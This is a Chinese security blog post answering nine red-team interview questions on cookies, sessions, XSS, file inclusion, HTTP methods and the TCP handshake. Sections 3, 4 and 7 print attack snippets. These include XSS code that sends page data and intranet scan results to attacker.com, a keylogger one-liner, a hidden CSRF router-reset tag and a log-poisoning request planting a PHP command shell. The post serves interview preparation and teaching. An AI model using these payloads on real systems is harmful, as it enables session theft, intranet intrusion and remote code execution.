安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年HW(护网面试) 57
1、xss通常是用来获取cookie,关于cookie,你了解多少,有多少属性。 2、cookie和session有什么区别 3、假设有这样一个情景,你通过xss可以拿到管理员cookie,你如何知道后台在哪里 4、如果后台在内网里,你无法登录,那么你该怎么办。如何更大效率的利用这个xss 5、HTTP请求方式 6、擅长哪一块 7、有一个网站,存在文件包含漏洞。但是没有上传点。如果是你会怎么利用 8、网络原理,和系统原理这边你怎么样 9、tcp三次握手,标志位
1. Cookie属性详解
Cookie是通过
Set-Cookie
头设置的键值对数据块,包含以下核心属性(RFC 6265标准):
Name/Value
:数据主体Domain
:指定生效域名(如.example.com
匹配子域名)Path
:限定URL路径(如/admin
)Expires/Max-Age
:过期时间(会话Cookie在浏览器关闭后失效)Secure
:仅通过HTTPS传输HttpOnly
:禁止JavaScript访问(防XSS窃取)SameSite
(现代浏览器强制):
Strict
:完全禁止跨站携带Lax
:允许部分安全跨站请求(如导航跳转)None
:允许跨站(需配合Secure)📌 XSS利用关键:若未设置
HttpOnly
,攻击者可通过document.cookie
窃取Cookie实现会话劫持。
2. Cookie vs Session 区别
特性 Cookie Session 存储位置 客户端浏览器 服务端(内存/数据库) 安全性 较低(易被窃取) 较高(仅Session ID暴露) 数据大小限制 ≤4KB 无硬性限制 依赖关系 无需服务端状态 依赖Session ID(常存于Cookie) 生命周期 可长期保存 通常随会话结束销毁 ⚠️ 本质关联:Session ID通常通过Cookie传递(如
PHPSESSID=abc123
),XSS窃取后可直接伪装用户身份。
3. 通过XSS获取管理员Cookie后定位后台
实战步骤:
- 解析Cookie路径
- 检查Cookie的
Path
属性(如Path=/admin
暗示后台路径)- 扫描常见后台地址
- 使用字典爆破:
/admin
,/wp-admin
,/manager
,/console
等- 工具:Burp Intruder / DirBuster
- 分析HTTP响应
- 访问疑似路径观察状态码(
302跳转→登录页
/200→后台界面
)- 提取页面线索
- 通过XSS注入脚本爬取页面:
javascript
fetch('/').then(r=>r.text()).then(data=>{ if(data.includes('Dashboard')) location='http://attacker.com?leak='+btoa(data); })
4. 后台在内网时的XSS高阶利用
替代渗透方案:
- 反向代理隧道
利用XSS让浏览器访问内网资源并回传数据:javascript
// 探测内网IP段(如192.168.1.x) for(let i=1; i<255; i++){ fetch(`http://192.168.1.${i}:8080/admin`, {mode:'no-cors'}) .then(() => fetch(`http://attacker.com?ip=192.168.1.${i}`)) }
- CSRF攻击内网系统
伪造管理员请求操作内网设备(如路由器重置):html
<img src="http://192.168.1.1/reset?confirm=1" style="display:none">
- 持久化水坑攻击
修改页面注入永久恶意脚本,等待管理员重复触发最大化利用策略:
- 窃取
LocalStorage
/IndexedDB
中敏感数据- 键盘记录:
document.onkeypress = e => exfil(e.key)
- 钓鱼伪造登录弹窗诱骗管理员输入凭证
5. HTTP请求方法
方法 幂等性 安全 主要用途 GET
是 是 获取资源(参数在URL) POST
否 否 提交数据(表单/文件上传) PUT
是 否 完整更新资源 DELETE
是 否 删除资源 PATCH
否 否 部分更新资源 HEAD
是 是 获取响应头(无Body) OPTIONS
是 是 查询服务器支持的通信选项 🔐 安全提示:
PUT/DELETE
方法可能导致资源篡改,生产环境建议禁用。
6. 专业领域强项
- Web安全:XSS/CSRF/SQLi/SSRF漏洞原理与利用
- 协议分析:HTTP/TCP/DNS协议栈深度解析
- 内网渗透:隧道技术/横向移动/权限维持
- 漏洞挖掘:白盒审计(Java/PHP)、模糊测试
7. 无上传点的文件包含漏洞利用
突破思路:
- 日志注入(Apache/Nginx)
- 伪造含PHP代码的User-Agent:
http
GET /index.php?file=/var/log/apache2/access.log HTTP/1.1 User-Agent: <?php system($_GET['cmd']); ?>
- 污染临时文件
- 触发超大POST请求生成临时文件,包含路径如
/tmp/phpXXXXXX
- 利用/proc目录(Linux)
- 包含进程环境变量:
?file=/proc/self/environ
- 读取进程内存:
?file=/proc/self/mem
(需精确偏移)- SSRF组合利用
- 包含内网服务文件:
?file=http://192.168.1.100/config
8. 网络/系统原理掌握度
核心能力:
- 网络层:
- OSI七层模型 · ARP欺骗 · VLAN跳转
- BGP路由劫持 · DNS Rebinding攻击
- 系统层:
- Linux权限模型(Capability/SELinux)
- Windows ACL/Token机制
- 进程注入(DLL/Shellcode)
9. TCP三次握手(含标志位)
交互流程:
mermaid
sequenceDiagram Client->>Server: SYN=1, Seq=X Server-->>Client: SYN=1, ACK=1, Seq=Y, Ack=X+1 Client->>Server: ACK=1, Seq=X+1, Ack=Y+1
- 标志位作用:
SYN
:同步序列号(发起连接)ACK
:确认数据有效(响应请求)- 序列号机制:
- 初始序列号(ISN)随机生成防预测
- 确认号=
对方Seq+数据长度
(握手阶段长度=1)🛡️ 安全风险:SYN Flood攻击利用半开连接耗尽服务器资源。